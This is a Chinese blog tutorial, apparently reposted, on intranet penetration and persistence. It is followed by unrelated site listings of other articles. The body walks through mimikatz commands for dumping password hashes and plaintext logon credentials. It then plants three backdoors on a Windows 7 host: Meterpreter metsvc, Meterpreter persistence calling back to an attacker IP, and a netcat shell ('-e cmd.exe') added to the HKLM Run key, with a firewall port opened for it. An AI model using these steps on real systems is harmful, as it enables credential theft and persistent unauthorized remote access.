内网渗透系列-mimikatz的使用以及后门植入

内网渗透系列-mimikatz的使用以及后门植入

文章目录
  • 内网渗透系列-mimikatz的使用以及后门植入
  • 前言
  • mimikatz的使用
  • 后门植入
    • msf永久后门植入
      • (1)Meterpreter后门:Metsvc
      • (2)Meterpreter后门:Persistence
    • NC后门
  • 后记

前言

内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持着权限,我们需要进行权限的维持,保持着下一次靶机登录时,我只需要监听端口,就可以获取对方的shell了。这就是我们今天说的后门植入的内容了。

mimikatz的使用

讲解后门植入的内容之前,我们先简单介绍一下mimikatz的用法,实际场景中我们可以反弹shell到cs中进行横向移动,使用自带的提权和mimikatz的模块进行获取用户的密码。

mimikatz的使用
(使用规则是:必须是管理员或者system权限才可以使用)
首先拿到会话以及system权限后,在加载插件
load mimikatz
help mimikatz

msv(导出哈希值)
用户名和密码哈希值

wdigest
直接获取的账号的明文密码

kerberos信息
也可以找出账号的明文密码

原来的命令
mimakatz_commend -h
mimakatz_commend -f

mimakatz_commend -f a::(写错误的指令,报出帮助信息)
会出现各个模块,比如
mimakatz_commend system::
mimakatz_commend system::user

获取哈希值
mimakatz_commend samdump::hashes

mimakatz_commend -f process::list(列出当前的进程信息)

mimakatz_commend -f service::list(列出当前的服务进程)

想在靶机上打开一个cmd的窗口,就输入
mimakatz_commend -f nogpo::
mimakatz_commend -f nogpo::cmd
mimakatz_commend -f nogpo::regedit

获取认证信息
mimakatz_commend -f sekurlsa::
mimakatz_commend -f sekurlsa::wdigest(获取明文信息)
mimakatz_commend -f sekurlsa::logonPasswords(获取用户的登录密码)

权限提升
mimakatz_commend -f privilege::
mimakatz_commend -f privilege::debug

破解扫雷游戏
mimakatz_commend -f minesweeper::infos

后门植入

msf永久后门植入

讲解方法之前,我们先了解一下为什么要生成后门

  • 1.meterpretere shell运行与内存中,重启后失效
  • 2.避免重复性的渗透工作
  • 3.漏洞修复后仍旧可就维持控制

两种方法生成后门:

(1)Meterpreter后门:Metsvc

通过服务启动

进入会话后
run metsvc -h
run metsvc -A //设定端口,上传后门文件
会在以下路径生成服务
C:\Users\zhian2\AppData\Local\Temp\tjPfsdnGycGdiM

这个服务是上传上去了,但没有显示在进程中,

我来讲解一下步骤吧
首先进入会话
在这里插入图片描述
在这里插入图片描述
上传成功,我们到靶机上查看上传的文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
服务已启动,但是在win7上执行metsvc.exe执行不了。

在这里我由于关掉了防火墙后uac,所以直接就get到system权限,之前得不到系统权限,是因为uac和防火墙的原因,所以想要提权的话,还是得绕过uac,或者直接上线cs,直接利用模块获取system的权限。

(2)Meterpreter后门:Persistence

通过启动型启动
特性:定期回连,系统 启动是回连,自动运行
Run persistence -A -S -U -i 20 -p 4321 -r 192.168.101.102

Run persistence -A -X -i 20 -p 4321 -r 192.168.101.102
(其中-A是生成的程序,-X是自动连接,-i是延时时间,-p是对应的端口,-r是kali的ip地址)

在这里给大家介绍第二种方法,比较好用,重启之后还是可以回连会话的。我们来尝试一下,步骤如下:
run persistence -A -X -i 20 -p 666 -r 192.168.101.102
在这里插入图片描述background
jobs
过了20秒后又会返回一个会话
在这里插入图片描述
我们删掉进程后,过了20秒,他有返回了一个会话了
sessions -k 9
在这里插入图片描述
我们就获得了system权限了
在这里插入图片描述
我们重启后,等待20秒,输入sessions查看会话,就会发现出现了新的会话了,或者再等一会,他自己就会回连一个会话了。
在这里插入图片描述
我们输入sessions -i 13,获取会话,getuid,getsystem,最终获得了system权限了。
在这里插入图片描述

NC后门

我先把大概的步骤给大家看一下,接下来就要开始演示了。
(3)NC后门
上传nc
Upload /rootnc.exe C:\windows\system32

修改注册表

  1. 枚举注册表键值:
    reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
  2. 在当前主键下增加一个nc 键值:
    reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’
  3. 查看nc键值:
    reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc

设置防火墙

  1. 开启有一个cmd通道
    execute -f cmd -i -H
  2. 查看防火墙状态
    Netsh firewall show opmode
  3. 添加防火墙规则允许444端口通过
    netsh firewall add portopening TCP 444 “Service Firewall” ENABLE
  4. 查看端口状态
    Netsh firewall show portopening

开始连接
nc -v ip port

具体步骤如下:
首先在kali的桌面上传一个nc.exe,或者放在/home/zhian/nc.exe

upload /home/zhian/nc.exe c:\windows\system32

枚举注册表键值:

reg enumkey -k HKLM\software\microsoft\windows\currentversion\run

在当前主键下增加一个nc 键值:

reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’(-d表示要执行的内容)

查看nc键值:

reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc

在这里插入图片描述

execute -f cmd -i -H(-H表示要开启一个cmd的窗口)
在这里插入图片描述

查看防火墙状态

Netsh firewall show opmode

添加防火墙规则允许444端口通过
netsh firewall add portopening TCP 444 “Service Firewall” ENABLE

查看端口状态

Netsh firewall show portopening

在这里插入图片描述
我们重启win7后,进程中就出现了nc.exe的进程,我们只需要监听即可
在这里插入图片描述
在kali上输入nc 192.168.101.102 444,就返回shell了
在这里插入图片描述
实验到这里就结束了,后续有学习内网渗透方面的知识,会给大家更新的,大家要好好复习呀。

后记

这只是内网渗透的冰山一角,也只是权限维持的一部分。内网如果要更深入的话,会涉及很多横向移动,权限提升方面的知识。最常见的就是路由和代理配置的问题,在往期文章都有提及到,大家可以看看我往期写的文章,好好复习一下吧。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/619072.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

fastjson

一:fastjson作用 1.将Java对象转换为json字符串》响应给前端。 2.将json字符串转换为Java对象 》接受前端的json数据封装到对象中。 二:常用API fastjson API 入口类是 com.alibaba.fastjson.JSON ,常用的序列化操作都可以在JSON类上的静态方法直接完…

【Leetcode每日一题】 分治 - 颜色分类(难度⭐⭐)(57)

1. 题目解析 题目链接:75. 颜色分类 这个问题的理解其实相当简单,只需看一下示例,基本就能明白其含义了。 2.算法原理 算法思路解析 本算法采用三指针法,将数组划分为三个区域,分别用于存放值为0、1和2的元素。通过…

C语言简单的数据结构:双向链表的实现

目录: 1.双向链表的结构和初始化1.1双向链表的结构1.2双向链表的初始化 2.双向链表的相关操作2.1双向链表的尾插、打印和头插2.11双向链表的尾插2.12双向链表的打印2.13双向链表的头插 2.2双向链表的尾删和头删2.21双向链表的尾删2.22双向链表的头删 2.3双向链表查找…

【信道编码】1 无线通信发展历程与挑战、信道分类、多径信道、单径信号传输与检测

【信道编码】1 无线通信发展历程与挑战、信道分类、多径信道、单径信号传输与检测 写在最前面无线通信发展历程一、电磁波的发现与利用(19世纪末至20世纪初)二、无线电技术的广泛应用(20世纪初至20世纪中叶)三、数字化与移动通信的…

OpenHarmony实战开发-异步并发概述 (Promise和async/await)。

Promise和async/await提供异步并发能力,是标准的JS异步语法。异步代码会被挂起并在之后继续执行,同一时间只有一段代码执行,适用于单次I/O任务的场景开发,例如一次网络请求、一次文件读写等操作。 异步语法是一种编程语言的特性&…

Tool:VRAM的简介、查询电脑VRAM的常用方法

Tool:VRAM的简介、查询电脑VRAM的常用方法 目录 VRAM的简介 查询电脑VRAM的常用方法 1、对于Windows系统 T1、设置-系统-显示查询法 T2、使用 DirectX 诊断工具: T3、使用系统信息工具: 2、对于Linux系统 T1、使用nvidia-smi命令&…

Python学习笔记19 - 类与对象

类的创建 对象的创建 类属性、类方法、静态方法 动态绑定属性和方法 面向对象的三大特征 封装:提高程序的安全性 继承:提高代码的复用性 多态:提高程序的可扩展性和可维护性 类的常用的特殊属性 类的常用的特殊方法 –add–() –len–() –…

Windows版PHP7.4.9解压直用(免安装-绿色-项目打包直接使用)

安装版和解压版 区别 安装版: 安装方便,下一步------下一步就OK了,但重装系统更换环境又要重新来一遍,会特别麻烦解压版(推荐): 这种方式(项目打包特别方便)能更深了解mysql的配置&…

正确使用@RequestMapping(包含属性详解)

目录 一、基本认知二、RequestMapping的基本使用三、深入学习RequestMapping1、RequestMapping的源码2、RequestMapping的属性2.1 path2.2 method2.3 params2.4 headers2.5 consumes2.6 produces2.7 name 一、基本认知 客户端发起Http请求,会提供一个URL [协议://域…

做一个后台项目的架构

后台架构的11个维度 架构1:团队协助基础工具链的选型和培训架构2:搭建微服务开发基础设施架构3:选择合适的RPC框架架构4:选择和搭建高可用的注册中心架构5:选择和搭建高可用的配置中心架构6:选择和搭建高性…

Qt快速入门(MV架构之TableView + QStandardItemModel + 自定义代理小案例)

Qt快速入门(MV架构之TableView QStandardItemModel 自定义代理小案例) 关于MV架构的简单介绍 在Qt框架中,代理(Delegate)、模型(Model)和视图(View)之间的关系构成了…

Kafka 架构深入探索

目录 一、Kafka 工作流程及文件存储机制 二、数据可靠性保证 三 、数据一致性问题 3.1follower 故障 3.2leader 故障 四、ack 应答机制 五、部署FilebeatKafkaELK 5.1环境准备 5.2部署ELK 5.2.1部署 Elasticsearch 软件 5.2.1.1修改elasticsearch主配置文件 5.2…